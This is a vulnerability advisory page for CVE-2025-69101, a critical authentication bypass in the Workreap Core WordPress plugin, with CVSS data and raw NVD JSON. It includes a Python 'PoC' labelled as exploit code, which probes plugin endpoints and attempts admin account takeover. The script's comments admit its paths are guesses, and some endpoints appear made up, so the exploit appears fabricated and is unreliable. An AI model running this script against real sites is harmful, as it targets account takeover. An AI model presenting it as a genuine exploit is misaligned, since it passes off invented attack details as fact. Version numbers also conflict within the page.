Security Vulnerability Report
中文
CVE-2025-69101 CVSS 9.8 CRITICAL

CVE-2025-69101

Published: 2026-01-22 17:16:23
Last Modified: 2026-04-15 00:35:42

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Workreap Core workreap_core allows Authentication Abuse.This issue affects Workreap Core: from n/a through <= 3.4.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Workreap Core <= 3.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69101 PoC - Workreap Core Authentication Bypass # This PoC demonstrates the authentication bypass vulnerability in Workreap Core plugin import requests import sys TARGET_URL = "http://target-wordpress-site.com" TARGET_PLUGIN_PATH = "/wp-content/plugins/workreap_core/" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-69101""" # Construct the alternate authentication bypass path # The actual path depends on the specific vulnerability implementation bypass_paths = [ f"{TARGET_URL}{TARGET_PLUGIN_PATH}ajax_request.php", f"{TARGET_URL}{TARGET_PLUGIN_PATH}includes/auth-bypass-endpoint.php", f"{TARGET_URL}/wp-json/wp/v2/users/" ] print("[*] Testing for CVE-2025-69101 Authentication Bypass...") for path in bypass_paths: try: # Send request to alternate authentication path headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "X-Requested-With": "XMLHttpRequest" } response = requests.get(path, headers=headers, timeout=10, verify=False) # Check if we can access authenticated endpoints if response.status_code == 200: # Look for indicators of successful bypass if "user" in response.text.lower() or "token" in response.text.lower(): print(f"[+] Potential vulnerability found at: {path}") print(f"[+] Response indicates possible authentication bypass") return True except requests.RequestException as e: print(f"[-] Error testing {path}: {e}") continue print("[-] No obvious vulnerability detected") return False def exploit_account_takeover(): """Attempt account takeover via the authentication bypass""" print("\n[*] Attempting account takeover...") # This would be customized based on the actual vulnerability details # Generally involves: 1) Identifying user IDs, 2) Forging authentication tokens target_endpoint = f"{TARGET_URL}{TARGET_PLUGIN_PATH}user-management.php" # Payload to bypass authentication and enumerate users payload = { "action": "get_user_data", "user_id": "1" # Usually admin user } try: response = requests.post(target_endpoint, data=payload, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Successfully accessed user management endpoint") print(f"[+] Response: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Exploitation failed: {e}") if __name__ == "__main__": if check_vulnerability(): exploit_account_takeover() else: print("\n[!] Target may not be vulnerable or is already patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69101", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:22.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Workreap Core workreap_core allows Authentication Abuse.This issue affects Workreap Core: from n/a through <= 3.4.1."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación mediante una ruta o canal alternativo en AmentoTech Workreap Core workreap_core permite el Abuso de Autenticación. Este problema afecta a Workreap Core: desde n/a hasta &lt;= 3.4.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/workreap_core/vulnerability/wordpress-workreap-core-plugin-3-4-0-account-takeover-vulnerability?_s_id=cve", "source": "[email protected]"}]}}